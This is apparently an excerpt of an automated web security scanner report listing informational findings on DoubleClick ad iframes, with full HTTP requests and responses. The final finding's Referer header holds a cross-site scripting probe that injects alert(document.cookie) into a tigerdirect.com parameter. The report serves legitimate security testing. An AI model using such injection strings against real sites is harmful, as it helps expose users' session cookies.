22.18. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=

The response contains the following links to other domains:

http://s0.2mdn.net/1323822/1-Womens_Rollback_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:24:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
9894955/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"><img src="http://s0.2mdn.net/1323822/1-Womens_Rollback_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.19. http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4441.microsoftonline/B5073082

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/1381014/2-usps10_seqmes1_triala_300x250.jpg
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/c0/%2a/p;234084859;2-0;0;57336107;4307-300/250;39942938/39960725/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.prioritymail.com/msnbc2

Request

GET /adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 17:55:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 646

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/c0/%2a/p;234084859;2-0;0;57336107;4307-300/250;39942938/39960725/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.prioritymail.com/msnbc2"><img src="http://s0.2mdn.net/viewad/1381014/2-usps10_seqmes1_triala_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

22.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6566
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/2-Schwab_AI_Q410_Webinar-Analysis_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/x%3B234265784%3B0-0%3B0%3B58044025%3B4307-300/250%3B39750646/39768433/2%3B%3B%7Esscs%3D%3fhttp://activetrader.schwab.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/freetrial.aspx[QM]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:49:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6443

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/x%3B234265784%3B0-0%3B0%3B58044025%3B4307-300/250%3B39750646/39768433/2%3B%3B%7Esscs%3D%3fhttp://activetrader.schwab.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/freetrial.aspx[QM]offer=PLU"><img src="http://s0.2mdn.net/2530996/2-Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6566
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:02 GMT
Expires: Sun, 30 Jan 2011 19:26:02 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=;ord=1530413745?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/y%3B234266103%3B0-0%3B0%3B58044025%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=;ord=1530413745? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:52:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6567

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/y%3B234266103%3B0-0%3B0%3B58044025%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/1-Schwab_AI_Q410_Webinar-Analysis_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bd/%2a/n%3B234280362%3B1-0%3B0%3B58044029%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp://activetrader.schwab.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/freetrial.aspx[QM]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:54:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6573

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bd/%2a/n%3B234280362%3B1-0%3B0%3B58044029%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp://activetrader.schwab.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/freetrial.aspx[QM]offer=PLU"><img src="http://s0.2mdn.net/2530996/1-Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/2530996/Schwab_AI_Q410_Randy-ArticleC_300x250.gif
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bd/%2a/l;234282361;3-0;0;58044029;4307-300/250;38567024/38584781/1;;~sscs=%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/OptionsResources/intermediate.aspx[QM][AMP]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 720
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:04 GMT
Expires: Sun, 30 Jan 2011 19:26:04 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bd/%2a/l;234282361;3-0;0;58044029;4307-300/250;38567024/38584781/1;;~sscs=%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/OptionsResources/intermediate.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/viewad/2530996/Schwab_AI_Q410_Randy-ArticleC_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bd/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6554
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bd/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.27. http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/tigerdirect.com/Section_2_House

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1308101/FB_977x40-fblike.jpg

Request

GET /adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
